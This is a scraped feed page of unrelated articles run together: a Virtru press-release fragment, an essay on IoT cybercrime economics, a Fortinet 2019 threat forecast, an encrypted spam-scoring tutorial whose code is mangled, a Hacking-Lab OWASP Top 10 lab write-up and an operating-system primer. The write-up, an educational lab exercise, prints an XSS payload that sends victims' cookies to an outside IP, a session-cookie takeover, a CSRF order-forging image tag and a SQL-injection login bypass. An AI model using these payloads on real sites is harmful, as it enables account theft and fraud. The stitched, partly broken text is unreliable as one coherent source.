to enterprises, we empower organizations to build an enterprise-wide

culture of data privacy. Based on her previous work and experience,

Andrea will make an immediate impact.”

About Virtru

Virtru enables a culture of data privacy within enterprises by

protecting data wherever it goes, on any platform and across any

channel. Using Virtru’s scalable, Open Source Software (OSS) approach,

companies can quickly and easily establish trust, innovate and

collaborate without fear, and ensure data privacy throughout digital

transformation initiatives. Virtru protects the data of Fortune 500

companies, numerous state governments, and leading healthcare,

manufacturing and financial institutions.

Learn more:

Vitru blog: https://www.virtru.com/blog/

LinkedIn:

https://www.linkedin.com/company/virtru/

Twitter:

https://twitter.com/virtruprivacy

Contacts

Media contact:

Brandon Amico

Mesmerize Consulting

virtru@mesmerizeconsulting.com

(603)

203-4946


Virtru Strengthens Leadership Team with Nationally Recognized Data Privacy Advoc ...
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

The Economics Fueling IoT (In)security

$
0
0

Attackers understand the profits that lie in the current lack of security. That must change.

2018 might be remembered as the year security truly made its entry into the minds of enterprise Internet of Things (IoT) users. As a consequence, device manufacturers have learned to appreciate the value that security brings to their brand and its impact on their sales, while customers ― specifically, enterprise users ― have started to use the power of their wallets to demand security be baked into the products they buy.

Earlier this year, Bain & Company reported that enterprise IoT customers would be willing to pay 22% more for and buy 70% more of IoT devices if security was better. For an industry valued at $157 billion just over a year ago, the economic growth that could follow improved security would be astronomical.

But it isn't only the manufacturers who see security as a key source of increased income; attackers have begun to understand the profits that lie in the current lack of security. Cybercriminals are noticing the security flaws in the ever-growing connected devices world that can lead to handsome profits.

Ransomware,

the Proven Route

It seems every discussion about the profitability of cybercrime starts with ransomware, and with good reason. In the first half of 2018 alone, a total of 181.5 million traditional ransomware attacks took place . Furthermore, the average duration of an attack is now 23 days, leading most to believe the situation couldn't get much worse. However, IoT ransomware is only now starting to take flight , meaning that those numbers could still grow considerably.

IoT ransomware is different than its IT counterpart. While ransomware installed in a computer usually leverages the risk of data loss to compel victims to pay, most IoT devices upload their data to the cloud continuously, forcing attackers to rethink what will force the victim's hand. If past attacks are any reference, cybercriminals are learning that different devices require different approaches. For example, an attack on smart TVs can be performed at any time but has relatively low value, as seen by the late 2016 breach of LG TVs, in which victims were asked to pay $500 to free infected TVs . While an attack on a hotel should be done at peak season to maximize impact, such as in 2016 when an Austrian hotel paid 2 bitcoins to open its rooms' hacked smart locks .

Although ransomware has proven fairly profitable over time, it has multiple downsides. Two main things are that the attacker's malware is revealed upon performing the attack, making it difficult to replicate, and the uncertainty as to whether the victim will actually pay. As a result, we might be reaching the dawn of a new age, one of cryptocurrency miners aimed at IoT.

Cryptocurrency Mining

Miners leverage computers' processing power to mine for cryptocurrencies, so the more processing power, the more crypto that can be mined. As such, attackers prefer leveraging high-power devices such as computers, but they come with a higher risk of detection. IoT devices, on the other hand, usually lack user supervision for CPU usage, making them even better targets. In the first half of 2018, total cryptomining detected attacks grew to a reported 787,000 from only 74,547 in 2017's first half.

For enterprises and users, the damage done by a cryptocurrency mining malware comes from the additional energy consumption and devices' burnout, which reduces lifespan, leading to faster renewal cycles and increased costs. For cybercriminals though, the rewards can be incredibly high. Reports earlier this year estimated that a compromised device could generate $0.28 in Monero , a cryptocurrency, per day. Although this number might seem low, an attack such as the one onMikroTik routers from this past August, where over 200,000 routers were infected, could generate a tidy $56,000 per day. And with attacks going unnoticed, this healthy revenue stream could go on for days at a time.

Reducing IoT Cybercrime Profitability

Cybercriminals targeting IoT devices have begun to uncover the benefits described above, and that is before even discussing data theft, where something such as a single electronic medical record could be worth $1,000 in the black market . Ransomware, crypto-mining or data theft attacks are having greater repercussions for the victims and rewards for the attackers. And this might only be the beginning, as attackers find new creative ways to leverage the existing flaws for their personal gain.

To reduce IoT cybercrime, its profitability must be reduced as well. However, as the current landscape is proving, the solution doesn't lie at the enterprise or user level. It must lie with the manufacturers of the connected devices. Only when these manufacturers begin to build truly secure-by-design products that follow standardization guidelines and best practices, will we begin to see the trends reversed and cybercrime reduced.

Fortinet《2019威胁态势预测》:网络犯罪五大趋势

$
0
0

为管理分布式复杂网络,公司企业采用人工智能(AI)和机器学习来自动化通常需要高度人工监督与干预的繁琐耗时任务。这一安全生态系统的转型促使网络罪犯也转向了相同的方向。


Fortinet《2019威胁态势预测》:网络犯罪五大趋势

Fortinet《2019威胁态势预测》揭示了5种新兴恶意趋势:

1. AI模糊测试

因为针对的是未知威胁方法,利用零日漏洞是个特别有效的网络犯罪战术。幸运的是,网络罪犯想要发现并利用零日漏洞也是需要大量时间和专业技能的,因而零日漏洞攻击并不多见。零日漏洞发现与利用需要一种名为模糊测试的技术。

模糊测试技术常为专业威胁研究人员在实验室环境中所用,是用于发现硬件、软件接口及应用中漏洞的复杂技术。通过向接口或程序注入无效、非预期或半随机数据后再观察各种异常情况,比如程序崩溃、非法调试程序跳转、代码断言失败、潜在内存泄漏等,研究人员便可以发现被测对象中的未知漏洞。尽管使用模糊测试发现零日漏洞目前还是大多数网络罪犯能力范围之外的事,随着AI和机器学习模型被应用到这一过程上,零日漏洞发现也开始变得更为高效。因此,零日漏洞利用相对罕见的情况将发生改变,网络设备与系统防护将受到重大影响。

2. 持续不断的零日漏洞

虽然野生已知漏洞利用程序很多,网络罪犯实际上只利用了其中6%。但为保证有效防护,安全工具却必须覆盖全部,因为你没办法知道罪犯到底使用的是哪6%。而且,随着潜在威胁数量持续上升,随着潜在漏洞利用版图不断扩张,安全工具的性能要求也在不断攀升。为跟上威胁发展步调,安全工具需得在锁定监测目标上变得更加智能。

零信任环境之类的框架可能在应对威胁规模扩大方面有一定作用,但可以说,绝大多数人尚未准备好面对即将到来的下一代威胁――尤其是AI模糊测试技术将很快开始发现的那些。传统安全方法,比如打补丁或监测已知攻击,将因为无法预测设备的哪个方面会被漏洞利用而逐渐淘汰。在零日漏洞攻击可能无穷无尽且高度商品化的世界里,甚至沙箱之类就是为检测未知威胁而设计出来的工具,都有可能很快便不堪重负。

3. 蠕虫即服务

蠕虫智能技术的发展正将我们带入蠕虫僵尸网络可协作自主地碾压现有防御的现实。此类蠕虫网络不仅会提升防御技术的门槛,还会对底层犯罪商业犯罪模式产生影响,令网络罪犯机会大增,就像零日漏洞挖掘一样。

当前的犯罪生态系统主要还是人力驱动的。职业黑客打造定制漏洞利用在黑市售卖,甚至勒索软件即服务之类的新鲜事物也要求黑帽子工程师维护不同资源。但如果交付自治、自学习的蠕虫即服务,客户与黑帽子商人之间的直接交互量就会显著下降,从而使黑客在减少风险的同时还提升收益。

4. 定制蠕虫

将蠕虫划分至多个任务以达成所需产出与虚拟化非常类似。在虚拟化网络中,资源可按需启动或关闭虚拟机以解决特定问题,比如带宽。与之类似,蠕虫网络中的资源也可以分配或重分配去解决攻击链中遇到的特定问题。蠕虫即服务环境中,黑客商人应能以多种分析工具及漏洞利用程序重编程蠕虫,从入侵策略到逃逸和秘密数据渗漏都是黑客供货单上的选项。而且,因为蠕虫从设计上就有自治属性,它们几乎不需要来自蠕虫主人的交互或反馈,也不存在大多数漏洞利用程序的痛点――命令与控制中心。

5. 机器学习中毒

机器学习是大有前景的网络安全工具之一,可以训练设备及系统自主执行特定任务,比如划定基线行为、应用行为分析识别高级威胁,或者在面对复杂威胁时采取有效应对。繁琐人工任务,比如跟踪和修复设备,也可以交给经过恰当训练的系统来处理。然而,该过程也是把双刃剑。机器学习无关善恶,不良输入也会被当成良好输入来处理。网络罪犯可以通过给机器学习过程下毒,来训练设备或系统不在特定设备上应用补丁或更新,忽略特定类型的应用或行为,甚至不去记录特定流量,以便更好地规避检测。

为明日威胁做好准备

公司企业需重新思考自身当前安全策略,才能够理解某些具有前瞻性思维的恶意黑客所选定的道路。鉴于当今威胁态势全球化的本质,公司企业必须以机器速度响应威胁。AI与机器学习可以帮助公司企业打赢网络攻防战。在分布式网络中部署的终端产品上集成进机器学习与AI,再结合自动化与创新,公司企业在面对越来越激进的网络犯罪时便能更有底气。但要记住,同样的工具也可以被网络罪犯利用来攻击你。所以,做好准备。

Fortinet《2019威胁态势预测》:

https://www.fortinet.com/blog/industry-trends/predictions--ai-fuzzing-and-machine-learning-poisoning-.html

【本文是51CTO专栏作者“”李少鹏“”的原创文章,转载请通过安全牛(微信公众号id:gooann-sectv)获取授权】

戳这里,看该作者更多好文

分布式机器学习与同态加密-part2

$
0
0

分布式机器学习与同态加密-part2

所有的据科学家都会告诉你,数据集是人工智能(AI)的命脉。在之前的文章中,我们演示了使用python-paillier 库来实现联合学习的简单安全协议。在这篇文章中,我们将探讨如何使用加密模型对远程数据进行评分。

使用加密模型进行预测

在之前的文章中,我们演示了使用python-paillier 库来实现联合学习的简单安全协议。在这篇文章中,我们将探讨如何使用加密模型对远程数据进行评分。此技术解决方案的可行性非常有趣并且出于隐私原因而相关。这意味着模型的所有者(以及训练数据)不需要破坏远程数据所有者的隐私,以便对其数据进行评分;反之亦然,远程数据所有者对有关评分模型(以及训练数据)的任何信息视而不见,因为模型本身是加密的。

我们将假设对Paillier密码系统以及逻辑回归有所了解。这个例子的灵感来自博客文章@iamtrask。

我们使用Enron垃圾邮件数据集的子集。Alice在她拥有的电子邮件上训练垃圾邮件分类器。她希望将其应用于Bob的个人电子邮件,而不是:

要求鲍勃在任何地方发送他的电子邮件。

泄漏有关她所学习的模型或数据集的信息。

让鲍勃知道他的哪些电子邮件是垃圾邮件。 完整的代码可以在github上找到。

首先,我们进行必要的导入并包装下载和准备数据的代码。

import time

import os.path

from zipfile import ZipFile

from urllib.request import urlopen

from contextlib import contextmanager

import numpy as np

from sklearn.linear_model import LogisticRegression

from sklearn.feature_extraction.text import CountVectorizer

import phe as paillier

np.random.seed(42)

# Enron spam dataset hosted by https://cloudstor.aarnet.edu.au

url = [ 'https://cloudstor.aarnet.edu.au/plus/index.php/s/RpHZ57z2E3BTiSQ/download', 'https://cloudstor.aarnet.edu.au/plus/index.php/s/QVD4Xk5Cz3UVYLp/download' ]

def download_data():

“““Download two sets of Enron1 spam/ham e-mails if they are not here We will use the first as trainset and the second as testset. Return the path prefix to us to load the data from disk.““”

n_datasets = 2

for d in range(1, n_datasets + 1):

if not os.path.isdir('enron%d' % d):

URL = url[d-1]

print(“Downloading %d/%d: %s” % (d, n_datasets, URL))

folderzip = 'enron%d.zip' % d

with urlopen(URL) as remotedata:

with open(folderzip, 'wb') as z: z.write(remotedata.read())

with ZipFile(folderzip) as z:

z.extractall() os.remove(folderzip)

为了简单起见,电子邮件被表示为限制词汇表中单词的向量,其中每个特征值都计算一个单词在电子邮件中出现的时间。我们为此使用了一个

CountVectorzer。

def preprocess_data():

““” Get the Enron e-mails from disk. Represent them as bag-of-words. Shuffle and split train/test. ““” print(“Importing dataset from disk…“)

path = 'enron1/ham/'

ham1 = [open(path + f, 'r', errors='replace').read().strip(r”\n”)

for f in

os.listdir(path) if

os.path.isfile(path + f)]

path = 'enron1/spam/'

spam1 = [open(path + f, 'r', errors='replace').read().strip(r”\n”)

for f in

os.listdir(path) if

os.path.isfile(path + f)]

path = 'enron2/ham/'

ham2 = [open(path + f, 'r', errors='replace').read().strip(r”\n”)

for f in

os.listdir(path) if

os.path.isfile(path + f)]

path = 'enron2/spam/'

spam2 = [open(path + f, 'r', errors='replace').read().strip(r”\n”)

for f in

os.listdir(path) if

os.path.isfile(path + f)]

# Merge and create labels

emails = ham1 + spam1 + ham2 + spam2

y = np.array([-1] * len(ham1) + [1] * len(spam1) + [-1] * len(ham2) + [1] * len(spam2))

# Words count, keep only frequent words

count_vect = CountVectorizer(decode_error='replace', stop_words='english', min_df=0.001)

X = count_vect.fit_transform(emails)

print('Vocabulary size: %d' % X.shape[1])

# Shuffle

perm = np.random.permutation(X.shape[0]) X, y = X[perm, :], y[perm]

# Split train and test

split = 500

X_train, X_test = X[-split:, :], X[:-split, :] y_train, y_test = y[-split:], y[:-split]

print(“Labels in trainset are {:.2f} spam : {:.2f} ham”.format( np.mean(y_train == 1),

np.mean(y_train == -1))) return X_train, y_train, X_test, y_test

该方案的工作原理如下。Alice根据她拥有的数据对垃圾邮件分类器进行逻辑回归训练。学习之后,她使用Paillier密码方案生成公钥/私钥对。使用公钥加密模型。公钥和加密模型被发送给Bob。Bob将加密模型应用于他自己的数据,获取每封电子邮件的加密分数。Bob将这些加密的分数发送给Alice。Alice用私钥解密它们以获得垃圾邮件与垃圾邮件的预测。

该协议满足上述三个条件。特别是,Bob只看到加密的模型和加密的分数,并且在不知道私钥的情况下无法从中获取任何内容。

现在来实施。Alice需要能够对明文数据进行逻辑回归,加密模型以供远程使用,并使用私钥解密加密的分数。

class Alice:

def __init__(self): self.model = LogisticRegression()

def generate_paillier_keypair(self, n_length): self.pubkey, self.privkey = \ paillier.generate_paillier_keypair(n_length=n_length)

def fit(self, X, y): self.model = self.model.fit(X, y)

def predict(self, X): return self.model.predict(X)

def encrypt_weights(self): coef = self.model.coef_[0, :] encrypted_weights = [self.pubkey.encrypt(coef[i]) for i in range(coef.shape[0])] encrypted_intercept = self.pubkey.encrypt(self.model.intercept_[0]) return encrypted_weights, encrypted_intercept

def decrypt_scores(self, encrypted_scores):

return [self.privkey.decrypt(s)

for s in encrypted_scores]

Bob获得加密模型和公钥。他必须能够使用加密模型对本地明文数据进行评分,但如果没有Alice持有的私钥,则无法解密分数。

class Bob:

def __init__(self, pubkey): self.pubkey = pubkey

def set_weights(self, weights, intercept):

self.weights = weights

self.intercept = intercept

def encrypted_score(self, x): “““Compute the score of `x` by multiplying with the encrypted model, which is a vector of `paillier.EncryptedNumber`““”

score = self.intercept _, idx = x.nonzero()

for i in idx: score += x[0, i] * self.weights[i]

return score

def encrypted_evaluate(self, X): return

[self.encrypted_score(X[i, :]) for i in range(X.shape[0])]

让我们看看脚本在运行中。我们首先按顺序得到数据,并检验问题的维数:

download_data() X, y, X_test, y_test = preprocess_data() X.shape (500, 7994)

我们正在处理大约8000项功能。接下来,我们实例化Alice,它生成密钥对并在本地数据上拟合她的逻辑模型。

alice = Alice() alice.generate_paillier_keypair(n_length=1024) alice.fit(X, y)

尚未执行加密。让我们看看Alice的分类器的错误是_if_她可以访问Bob的原始(未加密)数据。当然,由于Bob的数据不可用,因此无法在实际场景中了解这一点。

np.mean(alice.predict(X_test) != y_test) 0.045683350745559882

现在,Alice加密分类器。

encrypted_weights, encrypted_intercept = alice.encrypt_weights()

我们用Alice的公钥实例化Bob。Bob使用加密分类器进行评分。

bob = Bob(alice.pubkey) bob.set_weights(encrypted_weights, encrypted_intercept) encrypted_scores = bob.encrypted_evaluate(X_test)

让我们看看其中一个加密分数是怎样的。

print(encrypted_scores[0].ciphertext()) 4975557101598019607333115657955782044002134197013151844631125970114580057948777697681679333578395930647500175104718976826465398554390717765586649503985800812276599674119580862642667636337378406851541955675614078001941547394030888287811317521894539431449722023192072949095429036555137484530752817765976765269293455734683337022787581827841503790798807907517815490376905382493360989832127082449724104557596689227300380104999472764265118788640333048806552912736240459059453425987302997946039793991525213509904102136530661457492688678688561944802008308534596837051863930132631396095952823207091622450117172795188329566587

爱丽丝解密鲍勃的分数。

scores = alice.decrypt_scores(encrypted_scores) scores[:5] [-14.511058062671882, -9.188384491859484, -1.746647646814274, -16.91595050694431, -6.716934039494412]

这些分数的符号相当于预测的等级。作为一个正确的检查,让我们看看这个模型的错误是什么。请记住,爱丽丝并不了解这一点,因为爱丽丝不拥有鲍勃的地面真相标签。错误与上面相同。

np.mean(np.sign(scores) != y_test) 0.045683350745559882 此处(一个链接)

提供了第二个示例的完整代码 ,运行时它将输出与协议的每个步骤相关的时序信息。

您可能会问:此协议和上一篇文章中的协议是否可以合并?事实上,他们可以模仿前者进行分类而后者进行回归的事实。原则上,您可以设置联合学习方案,其中由客户端培训的模型以加密形式远程部署,然后将预测发送回该客户端。

你可能还会喜欢: 什么是后量子密码学?

Hacking-Lab top 10系列教程

$
0
0

以下报告按照官网的要求写的,每一份报告需要三个部分,解释安全问题、解释你的攻击、解释缓解

6111 OWASP 2010 A1 SQL注入

提示:SQL注入是一种利用应用程序数据库层中发生的安全漏洞的技术。当用户输入被错误地过滤为嵌入在SQL语句中的字符串文字转义字符或用户输入没有强类型并因此意外执行时,存在漏洞。事实上,只要有一种编程或脚本语言嵌入到另一种语言中,就会出现更常见的漏洞类。

目标:

找出用户“hacker10”的信用卡详细信息。利用sql注入漏洞


Hacking-Lab top 10系列教程

解释安全问题:

由于未过滤sql字符导致的sql注入

解释你的攻击:

按照提示,密码存在 SQL 注入,试了一下万能密码, ‘or ’1′=’1 入侵成功。


Hacking-Lab top 10系列教程
Hacking-Lab top 10系列教程

解释缓解办法:

过滤关键的字符,’ ” or and 等。

6112 OWASP 2010 A2 跨站点脚本

提示:由于采取了多项安全措施,Glockenemil-Shop可以防止窃听,会话猜测和会话固定。留下模仿受害者的唯一攻击手段是会话窃取。


Hacking-Lab top 10系列教程
目标:

偷走几张会议门票,以获得受害者特权的Glockenemil-Shop。这可以通过滥用Glockenemil的留言簿启动适当的跨站点脚本(XSS)攻击来完成。

解释安全问题:

XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。

解释你的攻击:

1、这是一个XSS漏洞,那我们要找到可输入XSS的地方。

2、首先我们登录一个hacker11的账号,这个账号是攻击者账号。

3、购买一个商品,在商品评论处加入xss代码。

HELLO <script>var IP = "10.10.10.134"; new Image().src="http://" + IP + ":80/_INFO__" + escape(document.cookie ) + "__"</script>
Hacking-Lab top 10系列教程

4、开启apache日志,如果有人访问我,就会有相应的请求,这个请求带着用户的COOKIE

5、更换用户实验,我们用hacker12登录网站,然后在打开评论商品页面,观察一下相应的日志信息,已经获取到hacker12的cookie值


Hacking-Lab top 10系列教程

6、通过这串cookie登录hacker12

BCookie=xdNWHI2ujj5ZOuQLCXd4dQ==
Hacking-Lab top 10系列教程

7、发送cookie查看hacker12页面,登录成功


Hacking-Lab top 10系列教程
解释缓解:

过滤不安全的标签、实体化标签等。

6113 OWASP 2010 A3 身份验证和会话管理中断
Hacking-Lab top 10系列教程
提交过一个方案没通过,大家可以尝试一下。 6114 - OWASP 2010 A4 不安全的直接对象引用

提示:

这种战争游戏的重点是验证如何为每个角色/特权实现授权模式以访问保留的功能/资源。对通过Web应用程序提供的功能和数据的访问基本上取决于委托的主体。确保正确检查此关系至关重要。否则,客户可能会访问外国帐户信息甚至高度机密的数据,从而导致绕过授权漏洞。


Hacking-Lab top 10系列教程

目标:

连接到易受攻击的战争游戏Web应用程序。使用给定的用户名/密码组合(hacker10:指南针或黑客11:罗盘,…)。阅读您自己的个人资料 尝试绕过配置文件的授权方案,而无需与其他用户重新进行身份验证。 如果您被认证为hacker10,请尝试阅读/披露hacker12的个人资料。

解释安全问题:

应用程序在做验证的时候,未验证用户的真实性,从而导致了直接的不安全对象引用缺陷。

解释你的攻击:

1、查看hacker11和hacker12的基本信息


Hacking-Lab top 10系列教程
Hacking-Lab top 10系列教程

2、尝试使用burpsuite抓包 ,观察一下数据包内容,修改一下pid的内容发送数据包


Hacking-Lab top 10系列教程

3、发现hacker12的基本信息变更为hacker11的。


Hacking-Lab top 10系列教程

解释缓解:

设置加密的用户对象ID。

在接收用户对象时,验证登录的用户和实际的用户对象是否一致。

6115 OWASP A5 跨站请求伪造

提示:

跨站点请求伪造,也称为一键式攻击或会话骑行,缩写为CSRF或XSRF,是一种恶意利用网站,从而从网站信任的用户传输未经授权的命令。

目标:

换回Glockenshop并验证您的最后订单。

解释安全问题:

1、这是一个CSRF的漏洞,全称跨站请求伪造,也就是说攻击者可以通过某些手段在用户不知情的情况下发起攻击伪造用户的请求。这是因为在提交请求的时候没有验证用户的身份产生的。

解释你的攻击:

1、user:使用firefox登录我们用户hacker10,尝试购买一些商品

2、user:我们在hacker10的商城订单


Hacking-Lab top 10系列教程

3、hacker:我们尝试添加一个商品,抓包分析商品添加的情况,分析了一下productId=2 这个表示的商品的ID,quantity=2这个表示商品的数量


Hacking-Lab top 10系列教程

4、hacker:我们尝试伪造一个html,这个html的内容为

<img src="http://glocken.hacking-lab.com/12001/cookie_case0/cookie0/controller?action=addproduct&productId=6&quantity=5&Submit=Order" />

5、hacker:发送给用户html页面

6、user:打开html页面


Hacking-Lab top 10系列教程

7、user:看到自己的订单里多了商品


Hacking-Lab top 10系列教程

解释缓解:

1、在表单提交里面加一个token,并且保证token不可预测性。 2、设置同源策略,在不同源的情况下,不能完成相关的操作。 3、可以设置一个验证码提交 6116 OWASP A6 安全配置错误

提示:

XXE(Xml eXternal Entity)攻击是对应用程序的攻击,该应用程序使用错误配置的XML解析器解析来自不受信任来源的XML输入。可以强制应用程序打开任意文件和/或TCP连接。

目标:

找出数据库连接属性(mysql用户名和密码)。(/ opt / applic /的子目录中的mysql.properties)

解释安全问题:

XML外部实体注入,实际上就是没有过滤掉不可信的操作导致的一个问题,没有限制XML解释器接受的内容,导致XML解析了读取文件的相关操作。

解释你的攻击:

1、我们找到这个页面,观察了一下只有两个参数。


Hacking-Lab top 10系列教程

2、通过抓包我们修改XML的内容,加上system file:代码,然后通过Repeater观察返回包的情况,发现了XML注入后返回的内容


Hacking-Lab top 10系列教程

解释补救:

1、使用开发语言提供的禁用外部实体的方法 2、过滤用户提交的XML数据 6117 OWASP 2010 A7 不安全的加密存储

提示:

SQL注入是一种利用应用程序数据库层中发生的安全漏洞的技术。当用户输入被错误地过滤为嵌入在SQL语句中的字符串文字转义字符,或者用户输入没有强类型并因此意外执行时,就会出现此漏洞。事实上,只要有一种编程或脚本语言嵌入到另一种语言中,就会出现更常见的漏洞类。


Hacking-Lab top 10系列教程

目标:

披露所有注册用户的所有信用卡号码。使用以下Web应用程序。

披露所有mysql用户表,帐户,密码

解释安全问题:

这是一个由sql注入导致的问题,注入到数据库以后,发现用户名、密码和相关的数据,其中密码是明文的,这样会导致系统被入侵以后,直接导致账户密码泄露。

解释你的攻击:

1、找到搜索商品的注入点。 2、使用sqlmap跑出相关的数据
Hacking-Lab top 10系列教程

解释缓解:

1、过滤关键的字符串,补救sql注入 2、密码设置加密的形式,可以使用MD5加密。 6 118 OWASP 2010 A8 无法限制URL访问

提示:通常,对URL的唯一保护是指向该页面的链接不会呈现给未经授权的用户。但是,有动力,技术熟练或仅仅是幸运的攻击者可能能够找到并访问这些页面,调用函数和查看数据。


Hacking-Lab top 10系列教程

目标:

找到隐藏的管理员链接并获取完整的信用卡交易列表。

默默无闻的安全性不足以保护应用程序中的敏感功能和数据。必须在授予对敏感功能的请求之前执行访问控制检查,这可确保用户有权访问该功能。

解释安全问题:

这是由于不安全的链接访问导致的,由于没有验证用户的链接ID,导致直接获取了其他用户的信息

解释你的攻击:

1、找到这个链接,看到有个faction pay什么的,感觉像是订单信息。尝试访问了一下。


Hacking-Lab top 10系列教程
2、发现是要登录的,然后我们登录后,跳转到这个billing address页面。我们点击edit编辑一下页面
Hacking-Lab top 10系列教程

3、看到个人信息的页面,发现hacker11的个人信息


Hacking-Lab top 10系列教程

4、我们尝试修改pid,发现了hacker13的信息。


Hacking-Lab top 10系列教程

解释缓解:

1、验证链接的可信程度,验证pid=2的用户是否是hacker11登录的。不同的用户只能访问自己的信息6119 OWASP 2010 A9 传输层保护不足

6120 OWASP 2010 A10 未经验证的重定向和转发

后面两题没做,不是很理解想要实现什么,有解决的大佬,可以交流一下。

这些题目的难度并不高,有趣的地方在于整个写报告的过程

这个通关的方法还需要通过撰写官方要求的文档,提交后由平台审核。

这些文档必须是全英文的文档,一般都是老外审核。


Hacking-Lab top 10系列教程
*本文作者:Rogerd,转载请注明来自CodeSec.Net

成为“黑客”前,必须学习的“操作系统架构体系”

$
0
0

我们先做个比喻,计算机就好比一栋具备"智能功能的大楼",操作系统就是负责这栋"智能大楼"协调、管理和控制的"总控中心",计算机硬件就是组成这栋大楼的"钢筋、水泥",应用软件就是大楼里一个个具体的"环境、消防、人员监控系统"。这时候如果要入侵这栋智能大楼,我们最重要夺取哪一个关键点?我相信大家一定会选择"总控中心"。因此对于黑客学习内容里关键的一部分就是对于操作系统整体架构的掌握。

今天就以本篇文章,让大家对计算机系统架构有个初步认识!便于未来的学习中对操作系统有个更深刻的理解。

一、 操作系统的定义

操作系统(英语:operating system,作OS)是管理与资源的,同时也是计算机系统的内核与基石。操作系统需要处理如管理与配置、决定系统资源供需的优先次序、控制输入与输出设备、操作与管理等基本事务。操作系统也提供一个让用户与系统交互的操作界面。

操作系统是作为计算机硬件和计算机用户之间的中介的程序。操作系统的目的是为用户提供方便且有效地执行程序的环境。操作系统是管理计算机硬件的软件,硬件必须提供合适的机制来保证计算机系统的正确性,以及确保系统不受用户程序干扰正常运行。操作系统庞大而复杂,因此它必须被分块构造。每一块都是系统中明确定义的一部分,具有严格定义的输入、输出和功能。


成为“黑客”前,必须学习的“操作系统架构体系”

操作系统由操作系统的内核(运行于内核态,管理硬件资源)以及系统调用(运行于用户态,为应用程序员写的应用程序提供系统调用接口)两部分组成,所以,单纯的说操作系统是运行于内核态的,是不准确的。

二、 操作系统的目标和作用 1、操作系统的目标:

1)有效性:提高系统资源利用率;提高系统的吞吐量。

2)方便性:

3)可扩充性:

4)开放性:开放性是指操作系统能遵循世界标准规范,特别是遵循开放系统互联(OSI) 国际标准。凡遵循国际标准所开放的硬件和软件,均能彼此兼容,可方便的实现互连。

2、操作系统的作用: 1)OS 作为用户与计算机硬件系统之间的接口:OS 处于用户与计算机硬件系统之间,用户通过 OS 来使用计算机系统。
成为“黑客”前,必须学习的“操作系统架构体系”

①命令方式:这是指由OS 提供了一组联机命令接口,以允许用户通过键盘输入有关命令来取得操作系统的服务,并控制用户程序的运行。

②系统调用方式:OS 提供了一组系统调用,用户可在自己的应用程序中通过相应的系统调用,来实现与操作系统的通信,并取得它的服务。

③图形、窗口方式:这是当前使用最为方便、最为广泛的接口,它允许用户通过屏幕上的窗口和图标来实现与操作系统的通信,并取得它的服务。

2)OS 作为计算机系统资源的管理者

系统资源分为四类:处理器、存储器、I/O设备、信息(数据和程序)。OS 的主要功能也正是针对这四类资源进行有效的管理,即:处理机管理,用于分配和控制处理机;存储器管理,主要负责内存的分配与回收;I/O 设备管理,负责 I/O设备的分配与操纵;文件管理,负责文件的存取、共享和保护。

当一个计算机系统同时供多个用户使用时,用户对系统中共享资源的需求(包括数量和时间)可能发生冲突,为了更好的管理好这些共享资源(包括硬件和信息)的使用,操作系统必须记录下各种资源的使用情况,对使用资源的请求进行授权,协调诸用户对共享资源的使用,避免发生冲突,并计算使用资源的费用等。

3)OS 实现了对计算机资源的抽象

对于一个完全无软件的计算机系统(即裸机),它向用户提供的是实际硬件接口(物理接口),用户必须对物理接口的实现细节有充分的了解,并利用机器指令进行编程,因此该物理机器必定是难以使用的。

在裸机上铺设的 I/O软件隐藏了对 I/O 设备操作的具体细节,向上提供了一组抽象的 I/O 设备。


成为“黑客”前,必须学习的“操作系统架构体系”

OS 是铺设在计算机硬件上的多层系统软件,它们不仅增强了系统的功能,而且还隐藏了对硬件操作的细节,由它们实现了对计算机硬件操作的多个层次的抽象。

三、 操作系统的结构 1、单一体结构

单一体结构是最早期的结构,这时整个OS是一个巨大的单一体,运行在内核态下,为用户提供服务,如下图所示。


成为“黑客”前,必须学习的“操作系统架构体系”

单一体结构各功能块之间关系复杂,修改困难,牵一发而动全身,且容易形成循环调用造成死锁,于是有了下面的层次关系。

2、分层结构

将操作系统的功能分成不同的层次,低层次的功能为紧邻其上一个层次的功能提供服务,而高层次的功能又为更高一个层次的功能提供服务,如下图所示。


成为“黑客”前,必须学习的“操作系统架构体系”

分层结构的主要优点:①易保证系统的正确性。自上而下的设计方式,是所有的设计中的决定都是有序的,或者说是建立在较为可靠的基础上,这样比较容易保证整个系统的正确性。②易扩充和易维护性。在系统中增加、修改或替换一个层次中的模块或整个层次,只要不改变相应层次间的接口,就不会影响其它层次,这必将使系统维护和扩充变得更加容易。

分层结构的主要缺点:系统效率降低了。由于层次结构是分层单向依赖的,因此必须在相邻层之间都要建立层次间的通信机制,OS 每执行一个功能,通常要自上而下地穿越多个层次,这无疑会增加系统的通信开销,从而导致系统效率的降低。

3、微内核结构

从单一体和层次化结构的图中可以看出,操作系统的所有功能都在内核态下运行。但是,从用户态转为内核态是有时间成本的,这样就会造成OS的效率低下。于是,人们将操作系统的核心中的核心才放在内核态运行,其他功能都迁移到用户态运行,于是就有了下面的微内核结构。


成为“黑客”前,必须学习的“操作系统架构体系”
微内核操作系统的优点:

1)提高了系统的可扩展性由于微内核 OS 的许多功能是由相对独立的服务器软件来实现的,当开发了新的硬件和软件时,微内核 OS 只需在相应的服务器中增加新的功能,或再增加一个专门的服务器。

2)增强了系统的可靠性由于微内核是出于精心设计和严格测试的,容易保证其正确性;另一方面是它提供了规范而精简的应用程序接口(API),为微内核外部的程序编制高质量的代码创造了条件。此外,由于所有服务器都是运行在用户态,服务器与服务器之间采用的是消息传递通信机制,因此,当某个服务器出现错误时,不会影响内核,也不会影响其他服务器。

3)可移植性在微内核结构的操作系统中,所有与特定 CPU 和 I/O 设备硬件有关的代码,均放在内核和内核下面的硬件隐藏层中,而操作系统其它绝大部分(即各种服务器)均与硬件平台无关,因而,把操作系统移植到另一个计算机硬件平台上所需的修改是比较小的。

4)提供了对分布式系统的支持由于在微内核 OS 中,客户和服务器之间以及服务器和服务器之间的通信,是采用消息传递通信机制进行的,致使微内核 OS 能很好地支持分布式系统和网络系统。事实上,只要在分布式系统中赋予所有进程和服务器唯一的标识符,在微内核中再配置一张系统映射表(即进程和服务器的标识符与它们所驻留的机器之间的对应表),在进行客户和服务器通信时,只需在所发送的消息中表上所发送进程和接收进程的标识符,微内核便可利用系统映射表,将消息发往目标,而无论目标是驻留在哪台机器上。

